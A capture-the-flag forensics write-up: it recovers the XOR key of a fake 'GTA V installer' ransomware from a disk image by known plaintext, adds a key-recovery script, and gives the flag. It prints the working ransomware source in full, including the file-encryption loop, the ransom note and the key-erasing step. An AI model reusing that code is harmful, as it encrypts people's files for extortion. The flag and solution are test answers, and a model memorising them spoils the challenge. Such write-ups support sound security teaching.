Pas Un Bon Nom
Difficulty: Easy
Statement
I was just chilling on my PC, y'know? Downloading movies and stuff, y'know? And then there's this weird message saying I have to pay Dogecoin to decrypt my data. I didn't do it... so now my data is encrypted :( So here, take the hard drive, it's not like it's any use now... Unless it were possible to find the key that nasty hacker used, y'know? Pleeease? You'd be adorable, thanks!
Solve
Mount the vmdk:

```shell
sudo modprobe nbd
sudo qemu-nbd -r -c /dev/nbd1 ./PC-jeanne-disk002.vmdk
mount -o ro,noload /dev/nbd1p1 /mnt/tmp
```
Solve 1
A file left on the disk tells us which kind of encryption was used (here, XOR with a repeating key):
```shell
cat home/jeanne/GTA_V_installer.py
```

```python
#!/bin/python3
import os
import fileinput
import sys

main_folder = "./"


def encryptDecrypt(inpDataBytes):
    # Define XOR key
    keyLength = len(xorKey)
    # calculate length of input string
    length = len(inpDataBytes)
    # perform XOR operation of key
    # with every byte
    for i in range(length):
        inpDataBytes[i] = inpDataBytes[i] ^ ord(xorKey[i % keyLength])
    return inpDataBytes


if __name__ == '__main__':
    # list all the files in the main folder, and its subfolders
    #list_of_files = [main_folder + f for f in os.listdir(main_folder) if os.path.isfile(main_folder + f) and not f.startswith('.')]
    list_of_files = []
    for root, dirs, files in os.walk(main_folder):
        for file in files:
            if not '/.' in os.path.join(root, file):
                # get the file name
                list_of_files.append(os.path.join(root, file))
    print(list_of_files)
    print("\n")

    xorKey = input("Enter the key you received after following the instructions in READ_TO_RETRIEVE_YOUR_DATA.txt: ")

    for file in list_of_files:
        if "GTA_V_installer.py" not in file:
            with open(file, 'rb') as f:
                data = bytearray(f.read())
            print("data : " + str(data) + "\n")
            encrypted_data = encryptDecrypt(data)
            print("encrypted : " + str(encrypted_data) + "\n")
            with open(file, 'wb') as f:
                f.write(encrypted_data)

    # Create a READ_TO_RETRIEVE_YOUR_DATA.txt file
    with open(main_folder + "READ_TO_RETRIEVE_YOUR_DATA.txt", 'w') as f:
        f.write("Your PC is now encrypted.\nThe only way you may retrieve your data is by sending 1000 Bitcoins to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\n")
        f.write("Add a message to the Bitcoin transfer with your email address.\nThe code to decrypt your data will be sent automatically to this email.\n")
        f.write("Once you get this code, simply run \"python GTA_V_installer.py\" and input your code.\n")
        f.write("I'm very sorry for the inconvenience. I need to feed my family.\n")
        f.write("HODL.\n")

    # I replace the line where the key is defined, that way I can use the same script for decryption without leaving any trace of the key
    is_edited = False
    for line in fileinput.input("./GTA_V_installer.py", inplace=1):
        if "xorKey = " in line and not is_edited:
            line = "    xorKey = input(\"Enter the key you received after following the instructions in READ_TO_RETRIEVE_YOUR_DATA.txt: \")\n"
            is_edited = True
        sys.stdout.write(line)
```
So the objective is to find the key used, in order to decrypt the documents.
After looking through the logs, the bash_history, etc., we find nothing special that would let us decrypt the documents.
However, if we look in the Documents folder:
```shell
ls -al home/jeanne/Documents/
total 72
drwxr-xr-x  2 zarkyo zarkyo  4096 14 oct.  12:29 .
drwxr-x--- 13 zarkyo zarkyo  4096 14 oct.  12:31 ..
-rw-rw-r--  1 zarkyo zarkyo  1116 14 oct.  12:31 2019_Q1_report.txt
-rw-rw-r--  1 zarkyo zarkyo   994 14 oct.  12:31 2019_Q2_report.txt
-rw-rw-r--  1 zarkyo zarkyo  1011 14 oct.  12:31 2019_Q3_report.txt
-rw-rw-r--  1 zarkyo zarkyo  1260 14 oct.  12:31 2019_Q4_report.txt
-rw-rw-r--  1 zarkyo zarkyo  1343 14 oct.  12:31 2020_Q1_report.txt
-rw-rw-r--  1 zarkyo zarkyo  1264 14 oct.  12:31 2020_Q2_report.txt
-rw-rw-r--  1 zarkyo zarkyo  1265 14 oct.  12:31 2020_Q3_report.txt
-rw-rw-r--  1 zarkyo zarkyo  1347 14 oct.  12:31 2020_Q4_report.txt
-rw-rw-r--  1 zarkyo zarkyo  1468 14 oct.  12:31 2021_Q1_report.txt
-rw-r--r--  1 zarkyo zarkyo 12288 14 oct.  12:29 .2021_Q1_report.txt.swp
-rw-rw-r--  1 zarkyo zarkyo  1289 14 oct.  12:31 2021_Q2_report.txt
-rw-rw-r--  1 zarkyo zarkyo  1407 14 oct.  12:31 2021_Q3_report.txt
-rw-rw-r--  1 zarkyo zarkyo  1447 14 oct.  12:31 2021_Q4_report.txt
-rw-rw-r--  1 zarkyo zarkyo  1434 14 oct.  12:31 2022_Q1_report.txt
```
We notice the hidden file .2021_Q1_report.txt.swp, a Vim swap file that is not encrypted: the script skips every path containing '/.', so hidden files were never touched. We also have its encrypted version, 2021_Q1_report.txt.
To get the key, we just compute cipher XOR plain: each byte was XORed with one byte of the key, so XORing the ciphertext against the known plaintext gives the key stream back.
We take our encrypted file, convert it to hex (CyberChef), then in dCode we supply the hex we just obtained together with this ASCII key (the start of the report's plaintext): In Q1, we achieved our highest ever vehicle production and deliveries. This was in s
We get base64 at the beginning of our result:
```shell
echo 'REdIQUNLezdIMTVfMVNfN0gzX0szWV9HMVYzTl83MF83SDNfR1RBX1ZfUjRONTBNVzRSM19WMUM3MU01fQo=' | base64 -d
DGHACK{7H15_1S_7H3_K3Y_G1V3N_70_7H3_GTA_V_R4N50MW4R3_V1C71M5}
```
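The known-plaintext step above, done in code instead of CyberChef and dCode. This is an added example, not part of the write-up or of the challenge files: it XORs a ciphertext against a known plaintext prefix to get the key stream, then either detects the key's period automatically (which needs at least two key lengths of known plaintext) or cuts the key at a length you already know. The second mode is the one the write-up actually uses: the ransomware XORs with the text of an 84-character base64 string, so the author supplied exactly 84 bytes of plaintext and read the base64 off the result. All data below (DEMO_SECRET, DEMO_PLAINTEXT) is constructed for the demo; nothing here is the challenge's real report or key.

```python
import base64
from itertools import cycle
from typing import Optional


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, byte by byte: the same operation the installer script's
    encryptDecrypt() performs, so it both encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """cipher XOR plain gives the key stream over every position where both are known."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def find_period(stream: bytes) -> Optional[int]:
    """Smallest p such that the stream repeats with period p, confirmed over at
    least one full repetition (len(stream) >= 2*p). Returns None when the
    observed stream is too short to confirm any period."""
    for p in range(1, len(stream) // 2 + 1):
        if all(stream[i] == stream[i - p] for i in range(p, len(stream))):
            return p
    return None


def recover_key(ciphertext: bytes, known_plaintext: bytes,
                key_length: Optional[int] = None) -> Optional[bytes]:
    """Recover the repeating XOR key from a known-plaintext prefix.

    With key_length given (e.g. you can see where the base64 string ends in
    the key stream), the first key_length bytes of the stream are returned as
    long as that many are available. Without it the period is detected
    automatically, which needs at least two key lengths of known plaintext."""
    stream = recover_keystream(ciphertext, known_plaintext)
    if key_length is not None:
        return stream[:key_length] if len(stream) >= key_length else None
    period = find_period(stream)
    return None if period is None else stream[:period]


# --- constructed demo data (not the challenge's real files) ---
# The installer XORs with the *text* of a base64 string, so base64-decoding
# the recovered key yields whatever the attacker encoded in it.
DEMO_SECRET = b"EXAMPLE{constructed_secret_not_from_the_challenge}\n"
DEMO_KEY = base64.b64encode(DEMO_SECRET)  # 68 bytes of key text
DEMO_PLAINTEXT = b"Quarterly report: production rose and deliveries hit a record. " * 3
DEMO_CIPHERTEXT = xor_with_key(DEMO_PLAINTEXT, DEMO_KEY)


def demo() -> dict:
    """Run the recovery both ways and return the results for inspection."""
    full = recover_key(DEMO_CIPHERTEXT, DEMO_PLAINTEXT)
    # Only one key length of known plaintext: not enough to confirm a period...
    short = recover_key(DEMO_CIPHERTEXT, DEMO_PLAINTEXT[:len(DEMO_KEY)])
    # ...but enough once the key length is known from the base64 boundary.
    short_hint = recover_key(DEMO_CIPHERTEXT, DEMO_PLAINTEXT[:len(DEMO_KEY)],
                             key_length=len(DEMO_KEY))
    return {
        "key": full,
        "key_from_short_prefix": short,
        "key_with_length_hint": short_hint,
        "decoded": None if full is None else base64.b64decode(full),
        "decrypted": None if full is None else xor_with_key(DEMO_CIPHERTEXT, full),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

With the real artefacts you would read the ciphertext from 2021_Q1_report.txt and the plaintext from the swap file; the recovered key is the base64 text itself, and base64-decoding it is what produces the flag. If the swap file gives you fewer bytes of plaintext than the key is long, recover_key returns None rather than a truncated key, which is the failure mode to watch for on a real case.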
Unmount the vmdk:

```shell
umount /mnt/tmp
qemu-nbd -r -d /dev/nbd1
```
Solve 2

```shell
strings * | grep -ari "xor" | more
[...]
n\n xorKey = \"REdIQUNLezdIMTVfMVNfN0gzX0szWV9HMVYzTl83MF83SDNfR1RBX1ZfUjRONTBNVzRSM19WMUM3MU01fQo=\"\n\n for file in list_of_files:\n if \"GTA_V_installer.py\" not in file:\n with open(file, 'rb') as f:\n
[...]
```
The key in base64 format appears at the beginning of the result:

```shell
echo 'REdIQUNLezdIMTVfMVNfN0gzX0szWV9HMVYzTl83MF83SDNfR1RBX1ZfUjRONTBNVzRSM19WMUM3MU01fQo=' | base64 -d
DGHACK{7H15_1S_7H3_K3Y_G1V3N_70_7H3_GTA_V_R4N50MW4R3_V1C71M5}
```
Flag: DGHACK{7H15_1S_7H3_K3Y_G1V3N_70_7H3_GTA_V_R4N50MW4R3_V1C71M5}